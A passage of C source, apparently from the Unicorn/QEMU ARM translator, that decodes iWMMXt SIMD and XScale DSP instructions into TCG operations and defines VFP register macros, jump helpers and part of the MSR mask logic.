0x000ff008) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); switch ((insn >> 22) & 3) { case 0: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 7) << 2) + 0); break; case 1: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 3) << 3) + 4); break; case 2: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 1) << 4) + 12); break; } tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 28); gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x401: case 0x405: case 0x409: case 0x40d: /* TBCST */ if (((insn >> 6) & 3) == 3) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); switch ((insn >> 6) & 3) { case 0: gen_helper_iwmmxt_bcstb(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; case 1: gen_helper_iwmmxt_bcstw(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_bcstl(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x113: case 0x513: case 0x913: case 0xd13: /* TANDC */ if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); switch ((insn >> 22) & 3) { case 0: for (i = 0; i < 7; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 1: for (i = 0; i < 3; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 2: tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); break; } gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x01c: case 0x41c: case 0x81c: case 0xc1c: /* WACC */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_helper_iwmmxt_addcb(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 1: gen_helper_iwmmxt_addcw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 2: gen_helper_iwmmxt_addcl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x115: case 0x515: case 0x915: case 0xd15: /* TORC */ if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); switch ((insn >> 22) & 3) { case 0: for (i = 0; i < 7; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); } break; 
case 1: for (i = 0; i < 3; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 2: tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); break; } gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x103: case 0x503: case 0x903: case 0xd03: /* TMOVMSK */ rd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; if ((insn & 0xf) != 0 || ((insn >> 22) & 3) == 3) return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 0: gen_helper_iwmmxt_msbb(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; case 1: gen_helper_iwmmxt_msbw(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; case 2: gen_helper_iwmmxt_msbl(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; } store_reg(s, rd, tmp); break; case 0x106: case 0x306: case 0x506: case 0x706: /* WCMPGT */ case 0x906: case 0xb06: case 0xd06: case 0xf06: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x00e: case 0x20e: case 0x40e: case 0x60e: /* WUNPCKEL */ case 0x80e: case 0xa0e: case 0xc0e: case 0xe0e: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsb_M0(tcg_ctx); else gen_op_iwmmxt_unpacklub_M0(tcg_ctx); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsw_M0(tcg_ctx); else gen_op_iwmmxt_unpackluw_M0(tcg_ctx); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsl_M0(tcg_ctx); else gen_op_iwmmxt_unpacklul_M0(tcg_ctx); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x00c: case 0x20c: case 0x40c: case 0x60c: /* WUNPCKEH */ case 0x80c: case 0xa0c: case 0xc0c: case 0xe0c: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsb_M0(tcg_ctx); else gen_op_iwmmxt_unpackhub_M0(tcg_ctx); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsw_M0(tcg_ctx); else gen_op_iwmmxt_unpackhuw_M0(tcg_ctx); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsl_M0(tcg_ctx); else gen_op_iwmmxt_unpackhul_M0(tcg_ctx); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x204: case 0x604: case 0xa04: case 0xe04: /* WSRL */ case 0x214: case 0x614: case 0xa14: case 0xe14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_srlw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: 
gen_helper_iwmmxt_srll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_srlq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x004: case 0x404: case 0x804: case 0xc04: /* WSRA */ case 0x014: case 0x414: case 0x814: case 0xc14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_sraw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_sral(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_sraq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x104: case 0x504: case 0x904: case 0xd04: /* WSLL */ case 0x114: case 0x514: case 0x914: case 0xd14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_sllw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_slll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_sllq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x304: case 0x704: case 0xb04: case 0xf04: /* WROR */ case 0x314: case 0x714: case 0xb14: case 0xf14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 1: if (gen_iwmmxt_shift(tcg_ctx, insn, 0xf, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: if (gen_iwmmxt_shift(tcg_ctx, insn, 0x1f, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: if (gen_iwmmxt_shift(tcg_ctx, insn, 0x3f, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x116: case 0x316: case 0x516: case 0x716: /* WMIN */ case 0x916: case 0xb16: case 0xd16: case 0xf16: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_minsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_minub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_minsw_M0_wRn(tcg_ctx, 
rd1); else gen_op_iwmmxt_minuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_minsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_minul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x016: case 0x216: case 0x416: case 0x616: /* WMAX */ case 0x816: case 0xa16: case 0xc16: case 0xe16: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_maxsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_maxsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_maxsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x002: case 0x102: case 0x202: case 0x302: /* WALIGNI */ case 0x402: case 0x502: case 0x602: case 0x702: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_const_i32(tcg_ctx, (insn >> 20) & 3); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rd1); gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x01a: case 0x11a: case 0x21a: case 0x31a: /* WSUB */ case 0x41a: case 0x51a: case 0x61a: case 0x71a: case 0x81a: case 0x91a: case 0xa1a: case 0xb1a: case 0xc1a: case 0xd1a: case 0xe1a: case 0xf1a: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 20) & 0xf) { case 0x0: gen_op_iwmmxt_subnb_M0_wRn(tcg_ctx, rd1); break; case 0x1: gen_op_iwmmxt_subub_M0_wRn(tcg_ctx, rd1); break; case 0x3: gen_op_iwmmxt_subsb_M0_wRn(tcg_ctx, rd1); break; case 0x4: gen_op_iwmmxt_subnw_M0_wRn(tcg_ctx, rd1); break; case 0x5: gen_op_iwmmxt_subuw_M0_wRn(tcg_ctx, rd1); break; case 0x7: gen_op_iwmmxt_subsw_M0_wRn(tcg_ctx, rd1); break; case 0x8: gen_op_iwmmxt_subnl_M0_wRn(tcg_ctx, rd1); break; case 0x9: gen_op_iwmmxt_subul_M0_wRn(tcg_ctx, rd1); break; case 0xb: gen_op_iwmmxt_subsl_M0_wRn(tcg_ctx, rd1); break; default: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x01e: case 0x11e: case 0x21e: case 0x31e: /* WSHUFH */ case 0x41e: case 0x51e: case 0x61e: case 0x71e: case 0x81e: case 0x91e: case 0xa1e: case 0xb1e: case 0xc1e: case 0xd1e: case 0xe1e: case 0xf1e: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_const_i32(tcg_ctx, ((insn >> 16) & 0xf0) | (insn & 0x0f)); gen_helper_iwmmxt_shufh(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x018: case 0x118: case 0x218: case 0x318: /* WADD */ case 0x418: case 0x518: case 0x618: case 0x718: case 0x818: case 0x918: case 0xa18: case 0xb18: case 0xc18: case 0xd18: case 0xe18: case 0xf18: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 20) & 0xf) { case 0x0: 
gen_op_iwmmxt_addnb_M0_wRn(tcg_ctx, rd1); break; case 0x1: gen_op_iwmmxt_addub_M0_wRn(tcg_ctx, rd1); break; case 0x3: gen_op_iwmmxt_addsb_M0_wRn(tcg_ctx, rd1); break; case 0x4: gen_op_iwmmxt_addnw_M0_wRn(tcg_ctx, rd1); break; case 0x5: gen_op_iwmmxt_adduw_M0_wRn(tcg_ctx, rd1); break; case 0x7: gen_op_iwmmxt_addsw_M0_wRn(tcg_ctx, rd1); break; case 0x8: gen_op_iwmmxt_addnl_M0_wRn(tcg_ctx, rd1); break; case 0x9: gen_op_iwmmxt_addul_M0_wRn(tcg_ctx, rd1); break; case 0xb: gen_op_iwmmxt_addsl_M0_wRn(tcg_ctx, rd1); break; default: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x008: case 0x108: case 0x208: case 0x308: /* WPACK */ case 0x408: case 0x508: case 0x608: case 0x708: case 0x808: case 0x908: case 0xa08: case 0xb08: case 0xc08: case 0xd08: case 0xe08: case 0xf08: if (!(insn & (1 << 20)) || ((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 1: if (insn & (1 << 21)) gen_op_iwmmxt_packsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_packsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packul_M0_wRn(tcg_ctx, rd1); break; case 3: if (insn & (1 << 21)) gen_op_iwmmxt_packsq_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packuq_M0_wRn(tcg_ctx, rd1); break; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x201: case 0x203: case 0x205: case 0x207: case 0x209: case 0x20b: case 0x20d: case 0x20f: case 0x211: case 0x213: case 0x215: case 0x217: case 0x219: case 0x21b: case 0x21d: case 0x21f: wrd = (insn >> 5) & 0xf; rd0 = (insn >> 12) & 0xf; rd1 = (insn >> 0) & 0xf; if (rd0 == 0xf || rd1 == 0xf) return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = load_reg(s, rd0); tmp2 = load_reg(s, rd1); switch ((insn >> 16) & 0xf) { case 0x0: /* TMIA */ gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0x8: /* TMIAPH */ gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0xc: case 0xd: case 0xe: case 0xf: /* TMIAxy */ if (insn & (1 << 16)) tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); if (insn & (1 << 17)) tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; default: tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); return 1; } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; default: return 1; } return 0; } /* Disassemble an XScale DSP instruction. Returns nonzero if an error occurred (ie. an undefined instruction). 
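 * This covers the MIA/MIAPH/MIAxy multiply-accumulate forms and the
 * MAR/MRA accumulator moves; only acc0 is implemented, so a nonzero
 * accumulator number is rejected.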
*/ static int disas_dsp_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int acc, rd0, rd1, rdhi, rdlo; TCGv_i32 tmp, tmp2; if ((insn & 0x0ff00f10) == 0x0e200010) { /* Multiply with Internal Accumulate Format */ rd0 = (insn >> 12) & 0xf; rd1 = insn & 0xf; acc = (insn >> 5) & 7; if (acc != 0) return 1; tmp = load_reg(s, rd0); tmp2 = load_reg(s, rd1); switch ((insn >> 16) & 0xf) { case 0x0: /* MIA */ gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0x8: /* MIAPH */ gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0xc: /* MIABB */ case 0xd: /* MIABT */ case 0xe: /* MIATB */ case 0xf: /* MIATT */ if (insn & (1 << 16)) tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); if (insn & (1 << 17)) tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; default: return 1; } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, acc); return 0; } if ((insn & 0x0fe00ff8) == 0x0c400000) { /* Internal Accumulator Access Format */ rdhi = (insn >> 16) & 0xf; rdlo = (insn >> 12) & 0xf; acc = insn & 7; if (acc != 0) return 1; if (insn & ARM_CP_RW_BIT) { /* MRA */ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, acc); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_R[rdhi], (1 << (40 - 32)) - 1); } else { /* MAR */ tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_V0, acc); } return 0; } return 1; } #ifdef _MSC_VER #define VFP_REG_SHR_NEG(insn, n) ((insn) << -(n)) #define VFP_SREG_NEG(insn, bigbit, smallbit) \ ((VFP_REG_SHR_NEG(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) #define VFP_REG_SHR_POS(x, n) ((x) >> (n)) #define VFP_SREG_POS(insn, bigbit, smallbit) \ ((VFP_REG_SHR_POS(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) #else #define VFP_REG_SHR(x, n) (((n) > 0) ?
(x) >> (n) : (x) << -(n)) #define VFP_SREG(insn, bigbit, smallbit) \ ((VFP_REG_SHR(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) #endif #define VFP_DREG(reg, insn, bigbit, smallbit) do { \ if (dc_isar_feature(aa32_simd_r32, s)) { \ reg = (((insn) >> (bigbit)) & 0x0f) \ | (((insn) >> ((smallbit) - 4)) & 0x10); \ } else { \ if (insn & (1 << (smallbit))) \ return 1; \ reg = ((insn) >> (bigbit)) & 0x0f; \ }} while (0) #ifdef _MSC_VER #define VFP_SREG_D(insn) VFP_SREG_POS(insn, 12, 22) #define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22) #define VFP_SREG_N(insn) VFP_SREG_POS(insn, 16, 7) #define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7) #define VFP_SREG_M(insn) VFP_SREG_NEG(insn, 0, 5) #define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5) #else #define VFP_SREG_D(insn) VFP_SREG(insn, 12, 22) #define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22) #define VFP_SREG_N(insn) VFP_SREG(insn, 16, 7) #define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7) #define VFP_SREG_M(insn) VFP_SREG(insn, 0, 5) #define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5) #endif static void gen_neon_dup_low16(TCGContext *tcg_ctx, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, var, var); tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_neon_dup_high16(TCGContext *tcg_ctx, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, var, var, 0xffff0000); tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static inline bool use_goto_tb(DisasContext *s, target_ulong dest) { struct uc_struct *uc = s->uc; return (s->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || ((s->base.pc_next - 1) & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_ptr(TCGContext *tcg_ctx) { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } /* This will end the TB but doesn't guarantee we'll return to * cpu_loop_exec. Any live exit_requests will be processed as we * enter the next TB. */ static void gen_goto_tb(DisasContext *s, int n, target_ulong dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (use_goto_tb(s, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_set_pc_im(s, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, n); } else { gen_set_pc_im(s, dest); gen_goto_ptr(tcg_ctx); } s->base.is_jmp = DISAS_NORETURN; } static inline void gen_jmp (DisasContext *s, uint32_t dest) { if (unlikely(is_singlestepping(s))) { /* An indirect jump so that we still trigger the debug exception. */ gen_set_pc_im(s, dest); s->base.is_jmp = DISAS_JUMP; } else { gen_goto_tb(s, 0, dest); } } static inline void gen_mulxy(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1, int x, int y) { if (x) tcg_gen_sari_i32(tcg_ctx, t0, t0, 16); else gen_sxth(t0); if (y) tcg_gen_sari_i32(tcg_ctx, t1, t1, 16); else gen_sxth(t1); tcg_gen_mul_i32(tcg_ctx, t0, t0, t1); } /* Return the mask of PSR bits set by a MSR instruction. */ static uint32_t msr_mask(DisasContext *s, int flags, int spsr) { uint32_t mask = 0; if (flags & (1 << 0)) { mask |= 0xff; } if (flags & (1 << 1)) { mask |= 0xff00; } if (flags & (1 << 2)) { mask |= 0xff0000; } if (flags & (1 << 3)) { mask |= 0xff000000; } /* Mask out undefined and reserved bits. */ mask &= aarch32_cpsr_valid_mask(s->features, s->isar); /* Mask out execution state. */ if (!spsr) { mask &= ~CPSR_EXEC; } /* Mask out privileged bits. 
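 * In user mode only the condition flags (NZCVQ) and the GE bits
 * remain writable; writes to the mode, mask and IT bits are
 * silently discarded.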
